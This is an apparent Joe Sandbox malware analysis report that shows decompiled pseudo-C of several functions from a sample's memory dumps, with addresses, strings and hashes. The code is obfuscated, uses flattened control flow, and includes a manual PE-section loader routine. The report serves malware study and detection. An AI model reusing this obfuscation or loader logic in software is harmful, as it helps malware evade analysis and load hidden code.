						_push(_v1128);
						_push(_v1104);
						_push(_v1044);
						_t251 = E0087E1F8(0x861000, _v1064, __eflags);
						_t267 =  *0x886214; // 0x0
						_t253 =  *0x886214; // 0x0
						E00882D0A(_v1108, __eflags, _t253 + 0x23c, _v1084, _v1136, _v1048, _t267 + 0x34,  &_v1040, _t267 + 0x34, _t251);
						E0087FECB(_t251, _v1140, _v1100, _v1056, _v1092);
						_t294 =  &(_t294[0xe]);
						_t260 = 0x3b56309;
						continue;
					}
					if(_t260 == 0xa27996a) {
						_t257 =  *0x886214; // 0x0
						__eflags =  *((intOrPtr*)(_t257 + 0x20));
						_t260 =  !=  ? 0xb537953 : 0x7219719;
						continue;
					}
					if(_t260 != 0xb537953) {
						L13:
						__eflags = _t260 - 0xf6a818b;
						if(__eflags != 0) {
							continue;
						}
						return _t257;
					}
					_t257 = E0086A445();
					goto L8;
				}
				E00861CA1(_v1112, _v1132, _v1072,  &_v520);
				E0087654A(_v1096, _v1120, __eflags,  &_v1040, _v1068,  &_v520);
				_t294 =  &(_t294[5]);
				_t260 = 0x9631a61;
				goto L13;
			}

0x008727f9
0x008727ff
0x00872809
0x0087280e
0x00872813
0x0087281b
0x00872823
0x00872831
0x00872835
0x0087283d
0x0087284b
0x00872850
0x00872856
0x0087285e
0x00872866
0x0087286b
0x00872873
0x00872880
0x00872883
0x00872887
0x0087288c
0x00872894
0x0087289c
0x008728ac
0x008728b0
0x008728b8
0x008728c0
0x008728c8
0x008728d0
0x008728dc
0x008728df
0x008728e3
0x008728eb
0x008728f3
0x008728fd
0x00872901
0x00872909
0x00872911
0x0087291e
0x00872922
0x0087292a
0x00872937
0x0087293b
0x00872943
0x00872948
0x00872950
0x00872958
0x00872960
0x00872968
0x00872970
0x00872978
0x00872985
0x00872989
0x00872991
0x00872999
0x008729a1
0x008729a9
0x008729b1
0x008729be
0x008729c2
0x008729cc
0x008729d9
0x008729e3
0x008729f0
0x008729f8
0x00872a00
0x00872a08
0x00872a10
0x00872a18
0x00872a20
0x00872a28
0x00872a33
0x00872a36
0x00872a3a
0x00872a42
0x00872a4a
0x00872a52
0x00872a5a
0x00872a62
0x00872a6c
0x00872a70
0x00872a78
0x00872a80
0x00872a88
0x00872a8d
0x00872a95
0x00872a9d
0x00872aa2
0x00872aaa
0x00872ab2
0x00872aba
0x00872ac2
0x00872aca
0x00872acf
0x00872ad4
0x00872adc
0x00872ae4
0x00872ae9
0x00872aee
0x00872af6
0x00872afe
0x00872b06
0x00872b0e
0x00872b16
0x00872b1e
0x00872b26
0x00872b2b
0x00872b33
0x00872b41
0x00872c06
0x00872b70
0x00872b70
0x00000000
0x00872b70
0x00872b4d
0x00872c70
0x00872c7d
0x00872c7f
0x00000000
0x00872c8e
0x00872b55
0x00872b84
0x00872b8d
0x00872b91
0x00872b99
0x00872b9e
0x00872bc3
0x00872bd6
0x00872bf0
0x00872bf5
0x00872bf8
0x00000000
0x00872bf8
0x00872b5d
0x00872b74
0x00872b7b
0x00872b7f
0x00000000
0x00872b7f
0x00872b61
0x00872c52
0x00872c52
0x00872c58
0x00000000
0x00000000
0x00000000
0x00872c58
0x00872b6b
0x00000000
0x00872b6b
0x00872c24
0x00872c45
0x00872c4a
0x00872c4d
0x00000000

Strings

fG, xrefs: 00872A20
WYz, xrefs: 00872AAA
7h, xrefs: 0087285E
Yt, xrefs: 00872A95
ME, xrefs: 008727FF
A\gl, xrefs: 00872948
"G[, xrefs: 00872950
x;K, xrefs: 00872B1E

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: "G[$7h$A\gl$ME$WYz$fG$x;K$Yt
API String ID: 0-2581693823
Opcode ID: 2f2d3d1a2d9ada401c36a1c9b3dd5edeb022a3aabe41406984c0880f8508a7fa
Instruction ID: c17d5ec8fb286e9748223d8452daf9d70b710eb8281101ddeac024217d5a55c0
Opcode Fuzzy Hash: 2f2d3d1a2d9ada401c36a1c9b3dd5edeb022a3aabe41406984c0880f8508a7fa
Instruction Fuzzy Hash: D4C1FBB14093419FC369CF25C58A51BBBE1FBD4758F108A1DF29A96260D7B1CA49CF83

Uniqueness

Uniqueness Score: -1.00%

Function 00883263, Relevance: 10.2, Strings: 8, Instructions: 175
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00883263(void* __ecx, void* __edx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				void* _t171;
				void* _t188;
				void* _t198;
				void* _t200;
				signed int _t202;
				signed int _t203;
				signed int _t204;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				void* _t233;
				void* _t238;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;

				_push(_a16);
				_t240 = _a4;
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0087FE29(_t171);
				_v52 = 0x577e5f;
				_v52 = _v52 >> 2;
				_v52 = _v52 >> 2;
				_t202 = 0x5a;
				_v52 = _v52 / _t202;
				_v52 = _v52 ^ 0x00001f8d;
				_v56 = 0xc1a783;
				_v56 = _v56 | 0xd091f394;
				_t203 = 0x7d;
				_v56 = _v56 / _t203;
				_v56 = _v56 >> 0xa;
				_v56 = _v56 ^ 0x00004aea;
				_v36 = 0x5ab329;
				_v36 = _v36 | 0xfb978afd;
				_v36 = _v36 << 0xc;
				_v36 = _v36 << 5;
				_v36 = _v36 ^ 0x77fa0040;
				_v60 = 0xfb6851;
				_t204 = 0x5f;
				_v60 = _v60 / _t204;
				_v60 = _v60 + 0xffff827f;
				_v60 = _v60 + 0xffffffdf;
				_v60 = _v60 ^ 0x000cafd7;
				_v24 = 0xe59b9d;
				_v24 = _v24 + 0x8cf1;
				_v24 = _v24 << 0xd;
				_v24 = _v24 ^ 0xc51da5fe;
				_v40 = 0x4a3359;
				_v40 = _v40 + 0xb1f1;
				_v40 = _v40 ^ 0xc176e2ad;
				_v40 = _v40 << 0xb;
				_v40 = _v40 ^ 0xe0393f27;
				_v44 = 0x442ad8;
				_v44 = _v44 + 0xffffa8db;
				_v44 = _v44 ^ 0xa2d0149a;
				_v44 = _v44 | 0x2bbd0b31;
				_v44 = _v44 ^ 0xabb0f764;
				_v20 = 0x80424;
				_v20 = _v20 + 0xffff6539;
				_v20 = _v20 + 0xd5f9;
				_v20 = _v20 ^ 0x000cf2ae;
				_v48 = 0x677157;
				_v48 = _v48 + 0xec21;
				_v48 = _v48 ^ 0x036b165d;
				_t205 = 0x14;
				_v48 = _v48 / _t205;
				_v48 = _v48 ^ 0x002fc559;
				_v16 = 0xa7ae7b;
				_v16 = _v16 | 0x7198ce36;
				_v16 = _v16 << 1;
				_v16 = _v16 ^ 0xe373c07b;
				_v32 = 0xbd3d32;
				_v32 = _v32 | 0x84fa4a87;
				_v32 = _v32 * 0xf;
				_t206 = 0x34;
				_v32 = _v32 * 0x4e;
				_v32 = _v32 ^ 0xd7bdec0b;
				_v8 = 0x4158ae;
				_v8 = _v8 / _t206;
				_v8 = _v8 ^ 0x000847ec;
				_v28 = 0x8e7645;
				_v28 = _v28 + 0xffff0216;
				_v28 = _v28 + 0x7276;
				_t207 = 0x60;
				_v28 = _v28 * 0x4a;
				_v28 = _v28 ^ 0x290f0829;
				_v4 = 0x80a154;
				_v4 = _v4 ^ 0x762c831e;
				_v4 = _v4 ^ 0x76a70d93;
				_v12 = 0x206e81;
				_v12 = _v12 / _t207;
				_v12 = _v12 + 0xffffa107;
				_v12 = _v12 ^ 0xffff9c06;
				_t208 = _v60;
				_t188 = E0088287F(_v60, _a4, _v24);
				_t198 = _t188;
				_t242 =  &(( &_v60)[7]);
				if(_t198 != 0) {
					_t233 = E008762C7( *((intOrPtr*)(_t198 + 0x50)), _v36, _v40, _t208, _v44, _v20, _v48, _v56 | _v52);
					_t243 =  &(_t242[6]);
					if(_t233 == 0) {
						L6:
						return _t233;
					}
					E0087C9B0(_v16, _t233, _v32,  *((intOrPtr*)(_t198 + 0x54)),  *_t240, _v8);
					_t244 =  &(_t243[4]);
					_t238 = ( *(_t198 + 0x14) & 0x0000ffff) + 0x18 + _t198;
					_t200 = ( *(_t198 + 6) & 0x0000ffff) * 0x28 + _t238;
					while(_t238 < _t200) {
						_t196 =  <  ?  *((void*)(_t238 + 8)) :  *((intOrPtr*)(_t238 + 0x10));
						E0087C9B0(_v28,  *((intOrPtr*)(_t238 + 0xc)) + _t233, _v4,  <  ?  *((void*)(_t238 + 8)) :  *((intOrPtr*)(_t238 + 0x10)),  *_t240 +  *((intOrPtr*)(_t238 + 0x14)), _v12);
						_t244 =  &(_t244[4]);
						_t238 = _t238 + 0x28;
					}
					goto L6;
				}
				return _t188;
			}

0x00883268
0x0088326c
0x00883270
0x00883272
0x00883276
0x00883277
0x00883278
0x00883279
0x0088327e
0x00883288
0x0088328d
0x00883298
0x0088329d
0x008832a3
0x008832ab
0x008832b3
0x008832bf
0x008832c4
0x008832ca
0x008832cf
0x008832d7
0x008832df
0x008832e7
0x008832ec
0x008832f1
0x008832f9
0x00883305
0x0088330a
0x00883310
0x00883318
0x0088331d
0x00883325
0x0088332d
0x00883335
0x0088333a
0x00883342
0x0088334a
0x00883352
0x0088335a
0x0088335f
0x00883367
0x0088336f
0x00883377
0x0088337f
0x00883387
0x0088338f
0x00883397
0x0088339f
0x008833a7
0x008833af
0x008833b7
0x008833bf
0x008833cb
0x008833ce
0x008833d2
0x008833da
0x008833e2
0x008833ea
0x008833ee
0x008833f6
0x008833fe
0x0088340b
0x00883418
0x0088341b
0x0088341f
0x00883427
0x00883437
0x0088343b
0x00883443
0x0088344b
0x00883453
0x00883460
0x00883461
0x00883465
0x0088346d
0x00883475
0x0088347d
0x00883485
0x00883495
0x00883499
0x008834a1
0x008834ad
0x008834b1
0x008834b6
0x008834b8
0x008834bd
0x008834ea
0x008834ec
0x008834f1
0x00883557
0x00000000
0x00883559
0x00883508
0x00883511
0x0088351b
0x00883520
0x00883552
0x0088353a
0x00883547
0x0088354c
0x0088354f
0x0088354f
0x00000000
0x00883556
0x0088355f

Strings

_~W, xrefs: 0088327E
'?9, xrefs: 0088335F
J, xrefs: 008832CF
vr, xrefs: 00883453
!, xrefs: 008833B7
Wqg, xrefs: 008833AF
$P, xrefs: 008834CB
@, xrefs: 008832F1

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: !$$P$'?9$@$Wqg$_~W$vr$J
API String ID: 0-3966742547
Opcode ID: fef6665b2dcae0e8f76fd5e1b4eb73354bf8a0be14dccf9d357c285fbdd5a555
Instruction ID: 9bfe9e75751a8cd3905ec5d56ecf3cf1a41726d30aece5a68c9e37596ba88a82
Opcode Fuzzy Hash: fef6665b2dcae0e8f76fd5e1b4eb73354bf8a0be14dccf9d357c285fbdd5a555
Instruction Fuzzy Hash: FD813072508340AFC398CF66C88981BBBF2FBC5758F10991CF69986260D3B6D945CF06

Uniqueness

Uniqueness Score: -1.00%

Function 008817BD, Relevance: 9.1, Strings: 7, Instructions: 356
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E008817BD(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				char _v520;
				char _v1040;
				char _v1560;
				intOrPtr _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				intOrPtr _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				void* _t369;
				void* _t397;
				intOrPtr _t400;
				intOrPtr _t402;
				void* _t412;
				intOrPtr _t415;
				intOrPtr _t419;
				void* _t425;
				intOrPtr _t462;
				signed int _t463;
				signed int _t464;
				signed int _t465;
				signed int _t466;
				signed int _t467;
				signed int _t468;
				signed int _t469;
				signed int _t470;
				signed int* _t475;

				_push(_a8);
				_t462 = 0;
				_push(_a4);
				_push(0);
				_push(__ecx);
				E0087FE29(_t369);
				_v1576 = 0x13bb59;
				_t475 =  &(( &_v1728)[4]);
				_v1572 = 0x74d317;
				_v1568 = 0x8520ae;
				_t425 = 0xbbc45e7;
				_v1564 = 0;
				_v1636 = 0xff081c;
				_v1636 = _v1636 + 0xffff5aa8;
				_v1636 = _v1636 | 0xdf687e40;
				_v1636 = _v1636 ^ 0xdffe7eed;
				_v1592 = 0x1eb670;
				_t463 = 3;
				_v1592 = _v1592 / _t463;
				_v1592 = _v1592 ^ 0x000911f1;
				_v1588 = 0xd7f028;
				_v1588 = _v1588 + 0x99cf;
				_v1588 = _v1588 ^ 0x00d6a0ad;
				_v1668 = 0xda1be6;
				_v1668 = _v1668 >> 0xa;
				_v1668 = _v1668 + 0xb82c;
				_v1668 = _v1668 + 0xffff3cb9;
				_v1668 = _v1668 ^ 0x000447cb;
				_v1700 = 0x2ba1ed;
				_v1700 = _v1700 << 6;
				_v1700 = _v1700 + 0xffff6a87;
				_v1700 = _v1700 >> 0xf;
				_v1700 = _v1700 ^ 0x000ca1a2;
				_v1600 = 0xfc0906;
				_v1600 = _v1600 >> 0xe;
				_v1600 = _v1600 ^ 0x000a9240;
				_v1692 = 0xcdddf3;
				_v1692 = _v1692 | 0x4624ceaf;
				_v1692 = _v1692 >> 0xc;
				_v1692 = _v1692 | 0xae0b3fef;
				_v1692 = _v1692 ^ 0xae09d891;
				_v1652 = 0xd6e5ef;
				_v1652 = _v1652 + 0xffffecd6;
				_t464 = 0x1f;
				_v1652 = _v1652 * 0x1b;
				_v1652 = _v1652 ^ 0x16a7acad;
				_v1724 = 0x640b42;
				_v1724 = _v1724 + 0x7af0;
				_v1724 = _v1724 + 0xd7a0;
				_v1724 = _v1724 / _t464;
				_v1724 = _v1724 ^ 0x00003baa;
				_v1644 = 0x5d7e02;
				_v1644 = _v1644 ^ 0x280f1fa3;
				_v1644 = _v1644 | 0x80dcb776;
				_v1644 = _v1644 ^ 0xa8d7b48e;
				_v1612 = 0x310401;
				_v1612 = _v1612 << 0xc;
				_v1612 = _v1612 ^ 0x10456323;
				_v1708 = 0xec7d3e;
				_v1708 = _v1708 + 0xffff4756;
				_t465 = 0x19;
				_v1708 = _v1708 / _t465;
				_v1708 = _v1708 * 0x78;
				_v1708 = _v1708 ^ 0x04625198;
				_v1676 = 0xc1499c;
				_v1676 = _v1676 + 0x787f;
				_v1676 = _v1676 >> 7;
				_v1676 = _v1676 >> 0xd;
				_v1676 = _v1676 ^ 0x0006bbad;
				_v1620 = 0xc8864f;
				_v1620 = _v1620 + 0xdb64;
				_t466 = 0x71;
				_v1620 = _v1620 / _t466;
				_v1620 = _v1620 ^ 0x00054ec4;
				_v1716 = 0x58bfc6;
				_v1716 = _v1716 << 0xc;
				_v1716 = _v1716 << 6;
				_v1716 = _v1716 >> 0xa;
				_v1716 = _v1716 ^ 0x00309503;
				_v1584 = 0x2a66b4;
				_t467 = 0x6c;
				_v1584 = _v1584 * 0x62;
				_v1584 = _v1584 ^ 0x103c6d70;
				_v1628 = 0xcd0e9a;
				_v1628 = _v1628 + 0xffff6b98;
				_v1628 = _v1628 + 0xffffdc7c;
				_v1628 = _v1628 ^ 0x00cd4883;
				_v1684 = 0x7bfe73;
				_v1684 = _v1684 >> 5;
				_v1684 = _v1684 << 7;
				_v1684 = _v1684 * 0x31;
				_v1684 = _v1684 ^ 0x5ee8daf9;
				_v1660 = 0x1f1c01;
				_v1660 = _v1660 >> 4;
				_v1660 = _v1660 / _t467;
				_v1660 = _v1660 ^ 0x000ccbd2;
				_v1720 = 0x840fb2;
				_v1720 = _v1720 | 0xa69eff81;
				_v1720 = _v1720 << 0xe;
				_v1720 = _v1720 + 0xffff3037;
				_v1720 = _v1720 ^ 0xbfecb97e;
				_v1656 = 0xd8a297;
				_v1656 = _v1656 + 0x41c1;
				_v1656 = _v1656 ^ 0x1d9d441b;
				_v1656 = _v1656 ^ 0x1d437da6;
				_v1580 = 0xe77586;
				_v1580 = _v1580 + 0xfffff7e8;
				_v1580 = _v1580 ^ 0x00e53b2f;
				_v1728 = 0x20c0e;
				_v1728 = _v1728 + 0x594f;
				_t468 = 0x79;
				_v1728 = _v1728 / _t468;
				_v1728 = _v1728 ^ 0x017ec3a2;
				_v1728 = _v1728 ^ 0x01734834;
				_v1712 = 0x467deb;
				_v1712 = _v1712 | 0xfb06902d;
				_v1712 = _v1712 << 0xd;
				_v1712 = _v1712 << 0xb;
				_v1712 = _v1712 ^ 0xef0dc14e;
				_v1632 = 0xa85c1c;
				_v1632 = _v1632 << 3;
				_v1632 = _v1632 << 4;
				_v1632 = _v1632 ^ 0x54293107;
				_v1596 = 0x697bfe;
				_v1596 = _v1596 | 0x748d72c7;
				_v1596 = _v1596 ^ 0x74e3de32;
				_v1640 = 0x724245;
				_t222 =  &_v1640; // 0x724245
				_v1640 =  *_t222 * 0x4c;
				_t224 =  &_v1640; // 0x724245
				_v1640 =  *_t224 * 0x26;
				_v1640 = _v1640 ^ 0x08f66fe6;
				_v1648 = 0xa241b2;
				_v1648 = _v1648 >> 4;
				_v1648 = _v1648 << 0xe;
				_v1648 = _v1648 ^ 0x890355d2;
				_v1604 = 0x4e61c6;
				_v1604 = _v1604 | 0x297abf50;
				_v1604 = _v1604 ^ 0x29742082;
				_v1608 = 0xdfdd08;
				_v1608 = _v1608 | 0x096e656f;
				_v1608 = _v1608 ^ 0x09fe8e74;
				_v1624 = 0x7e1789;
				_v1624 = _v1624 + 0xd6ac;
				_v1624 = _v1624 + 0xffff1ac7;
				_v1624 = _v1624 ^ 0x007fce14;
				_v1688 = 0xd4150c;
				_v1688 = _v1688 << 3;
				_v1688 = _v1688 ^ 0x561d7592;
				_v1688 = _v1688 >> 0xa;
				_v1688 = _v1688 ^ 0x001f305a;
				_v1696 = 0x3e923d;
				_v1696 = _v1696 ^ 0x624df4c6;
				_t469 = 0x29;
				_v1696 = _v1696 / _t469;
				_v1696 = _v1696 + 0xffffe680;
				_v1696 = _v1696 ^ 0x026755ff;
				_v1704 = 0xed73af;
				_t470 = 0x36;
				_v1704 = _v1704 / _t470;
				_v1704 = _v1704 * 0x76;
				_v1704 = _v1704 >> 3;
				_v1704 = _v1704 ^ 0x0041c6e0;
				_v1664 = 0xe0489c;
				_v1664 = _v1664 * 0x4e;
				_v1664 = _v1664 * 0x21;
				_v1664 = _v1664 << 0xf;
				_v1664 = _v1664 ^ 0x084e6c7b;
				_v1672 = 0xcef4bd;
				_v1672 = _v1672 * 0x4b;
				_v1672 = _v1672 + 0xffff3dcb;
				_v1672 = _v1672 << 0x10;
				_v1672 = _v1672 ^ 0xf1249f73;
				_v1680 = 0x187dc5;
				_v1680 = _v1680 | 0x94fddf65;
				_v1680 = _v1680 << 1;
				_v1680 = _v1680 ^ 0x244f0190;
				_v1680 = _v1680 ^ 0x0db75cb9;
				_v1616 = 0xe6e563;
				_v1616 = _v1616 ^ 0xa5d4beb7;
				_v1616 = _v1616 + 0xffffcebd;
				_v1616 = _v1616 ^ 0xa53dba5b;
				do {
					while(_t425 != 0x6a96cc9) {
						if(_t425 == 0xabcd6f9) {
							_push(_t425);
							__eflags = E008785FF(_v1664, _v1672, __eflags, _t462,  &_v520, _t462, _v1680, _t462, _v1616);
							_t462 =  !=  ? 1 : _t462;
						} else {
							if(_t425 == 0xbbc45e7) {
								E00861A34(_v1592,  &_v1040, _t425, _t425, _v1588, _v1668, _v1700, _t425, _v1636, _v1600);
								_t475 =  &(_t475[8]);
								_t425 = 0xe9b1f6b;
								continue;
							} else {
								_t482 = _t425 - 0xe9b1f6b;
								if(_t425 != 0xe9b1f6b) {
									goto L8;
								} else {
									_push(_v1644);
									_push(_v1724);
									_push(_v1652);
									_t412 = E0087E1F8(0x861030, _v1692, _t482);
									E00867078( &_v1560, _t482);
									_t415 =  *0x886214; // 0x0
									_t419 =  *0x886214; // 0x0
									E0086F96F(_v1612, _t482, _t419 + 0x34, _t412,  &_v1560, _v1708,  &_v520, _t415 + 0x23c, _v1676, _v1620, _v1716,  &_v1040);
									E0087FECB(_t412, _v1584, _v1628, _v1684, _v1660);
									_t475 =  &(_t475[0x10]);
									_t425 = 0xabcd6f9;
									continue;
								}
							}
						}
						L11:
						return _t462;
					}
					_push(_v1728);
					_t346 =  &_v1580; // 0xe53b2f
					_push( *_t346);
					_push(_v1656);
					_t397 = E0087E1F8(0x8610f0, _v1720, __eflags);
					E00867078( &_v1560, __eflags);
					_t400 =  *0x886214; // 0x0
					_t402 =  *0x886214; // 0x0
					__eflags = _t402 + 0x23c;
					E0086BF5F(_v1712, _t402 + 0x23c, _v1632,  &_v1560, _v1596,  &_v520, _v1640,  &_v1040, _t402 + 0x23c, _v1648, _t400 + 0x34, _v1604, _v1608,  &_v1560, _t462);
					E0087FECB(_t397, _v1624, _v1688, _v1696, _v1704);
					_t475 =  &(_t475[0x13]);
					_t425 = 0xabcd6f9;
					L8:
					__eflags = _t425 - 0xcc0d361;
				} while (__eflags != 0);
				goto L11;
			}

0x008817c7
0x008817ce
0x008817d0
0x008817d7
0x008817d8
0x008817d9
0x008817de
0x008817e9
0x008817ec
0x008817f9
0x00881804
0x00881809
0x00881810
0x00881818
0x00881820
0x00881828
0x00881830
0x00881844
0x00881849
0x00881852
0x0088185d
0x00881868
0x00881873
0x0088187e
0x00881886
0x0088188b
0x00881893
0x0088189b
0x008818a3
0x008818ab
0x008818b0
0x008818b8
0x008818bd
0x008818c5
0x008818d0
0x008818d8
0x008818e3
0x008818eb
0x008818f3
0x008818f8
0x00881900
0x00881908
0x00881910
0x0088191d
0x00881920
0x00881924
0x0088192c
0x00881934
0x0088193c
0x0088194c
0x00881950
0x00881958
0x00881960
0x00881968
0x00881970
0x00881978
0x00881983
0x0088198b
0x00881996
0x0088199e
0x008819aa
0x008819ad
0x008819b6
0x008819ba
0x008819c4
0x008819cc
0x008819d4
0x008819d9
0x008819de
0x008819e6
0x008819ee
0x008819fc
0x00881a01
0x00881a0a
0x00881a15
0x00881a1d
0x00881a22
0x00881a27
0x00881a2c
0x00881a34
0x00881a47
0x00881a4a
0x00881a51
0x00881a5c
0x00881a64
0x00881a6c
0x00881a74
0x00881a7c
0x00881a84
0x00881a89
0x00881a93
0x00881a97
0x00881a9f
0x00881aa7
0x00881ab4
0x00881ab8
0x00881ac0
0x00881ac8
0x00881ad0
0x00881ad5
0x00881add
0x00881ae5
0x00881aed
0x00881af5
0x00881afd
0x00881b05
0x00881b10
0x00881b1b
0x00881b26
0x00881b2e
0x00881b3a
0x00881b3d
0x00881b41
0x00881b49
0x00881b51
0x00881b59
0x00881b61
0x00881b66
0x00881b6b
0x00881b73
0x00881b7b
0x00881b80
0x00881b85
0x00881b8d
0x00881b98
0x00881ba3
0x00881bae
0x00881bb6
0x00881bbb
0x00881bbf
0x00881bc4
0x00881bca
0x00881bd7
0x00881be4
0x00881be9
0x00881bee
0x00881bf6
0x00881c01
0x00881c0c
0x00881c17
0x00881c22
0x00881c2d
0x00881c38
0x00881c40
0x00881c48
0x00881c50
0x00881c58
0x00881c60
0x00881c65
0x00881c6d
0x00881c72
0x00881c7a
0x00881c82
0x00881c90
0x00881c95
0x00881c9b
0x00881ca3
0x00881cab
0x00881cb7
0x00881cba
0x00881cc3
0x00881cc7
0x00881ccc
0x00881cd4
0x00881ce1
0x00881cea
0x00881cee
0x00881cf3
0x00881cfb
0x00881d08
0x00881d0c
0x00881d14
0x00881d19
0x00881d21
0x00881d29
0x00881d31
0x00881d35
0x00881d3d
0x00881d45
0x00881d50
0x00881d5b
0x00881d66
0x00881d71
0x00881d71
0x00881d7f
0x00881f31
0x00881f5b
0x00881f5d
0x00881d85
0x00881d8b
0x00881e67
0x00881e6c
0x00881e6f
0x00000000
0x00881d91
0x00881d91
0x00881d93
0x00000000
0x00881d99
0x00881d99
0x00881da2
0x00881da6
0x00881dae
0x00881dbc
0x00881ddd
0x00881e03
0x00881e0d
0x00881e2d
0x00881e32
0x00881e35
0x00000000
0x00881e35
0x00881d93
0x00881d8b
0x00881f60
0x00881f6c
0x00881f6c
0x00881e76
0x00881e7f
0x00881e7f
0x00881e86
0x00881e8e
0x00881e9f
0x00881ebb
0x00881ec8
0x00881ecd
0x00881eff
0x00881f19
0x00881f1e
0x00881f21
0x00881f23
0x00881f23
0x00881f23
0x00000000

Strings

/;, xrefs: 00881E7F
>}, xrefs: 00881996
c, xrefs: 00881D45
EBr, xrefs: 00881BB6
OY, xrefs: 00881B2E
}F, xrefs: 00881B51
oen, xrefs: 00881C22

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: /;$>}$EBr$OY$c$oen$}F
API String ID: 0-419207597
Opcode ID: ac6c8e797406fad998f8d20c9bae2dcb44fc466dccdb796bffcdeba4ca84c0e3
Instruction ID: 21f6545053cffc29e05a22555039009e53c3d92a2d506b5b3fae868dca7ac269
Opcode Fuzzy Hash: ac6c8e797406fad998f8d20c9bae2dcb44fc466dccdb796bffcdeba4ca84c0e3
Instruction Fuzzy Hash: F00202715083809FD765CF65C88AA4BBBE5FBC4358F108A1DF2CA96260D7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 008677A3, Relevance: 9.1, Strings: 7, Instructions: 330
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E008677A3(signed int* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v60;
				signed int _v64;
				signed int _v68;
				unsigned int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				void* _t314;
				signed int _t352;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				void* _t370;
				signed int* _t401;
				signed int* _t405;
				void* _t407;

				_t402 = _a12;
				_push(_a12);
				_push(_a8);
				_t401 = __ecx;
				_push(_a4);
				_push(__ecx);
				E0087FE29(_t314);
				_v100 = 0xaefbe1;
				_t405 =  &(( &_v192)[5]);
				_v100 = _v100 + 0x6b82;
				_t370 = 0xc5526f;
				_t362 = 0x2b;
				_v100 = _v100 / _t362;
				_v100 = _v100 ^ 0x00041443;
				_v80 = 0x1d3414;
				_v80 = _v80 + 0xffffdb02;
				_v80 = _v80 ^ 0x0011ba60;
				_v72 = 0x54a5f8;
				_v72 = _v72 >> 0x10;
				_v72 = _v72 ^ 0x000d0ae3;
				_v136 = 0x274773;
				_t26 =  &_v136; // 0x274773
				_t363 = 0x1a;
				_v136 =  *_t26 * 0x4d;
				_v136 = _v136 + 0xffff9993;
				_v136 = _v136 ^ 0x0bd1637a;
				_v88 = 0xd58b4c;
				_v88 = _v88 + 0xffff1506;
				_v88 = _v88 ^ 0x00d01948;
				_v92 = 0x5e6930;
				_t38 =  &_v92; // 0x5e6930
				_v92 =  *_t38;
				_v92 = _v92 ^ 0x00540f59;
				_v116 = 0x40a51;
				_v116 = _v116 | 0x5ce3fa4e;
				_v116 = _v116 >> 2;
				_v116 = _v116 ^ 0x1737f89e;
				_v108 = 0x7d5bec;
				_v108 = _v108 | 0x0f0c5889;
				_v108 = _v108 + 0xbcf5;
				_v108 = _v108 ^ 0x0f7d2458;
				_v164 = 0x3d5dd8;
				_v164 = _v164 ^ 0x644c870b;
				_v164 = _v164 >> 0xd;
				_v164 = _v164 * 0x7a;
				_v164 = _v164 ^ 0x017eec74;
				_v180 = 0x53df1b;
				_v180 = _v180 / _t363;
				_v180 = _v180 + 0xffff91ff;
				_v180 = _v180 + 0xffff90b6;
				_v180 = _v180 ^ 0x000d2df2;
				_v76 = 0x6cb33c;
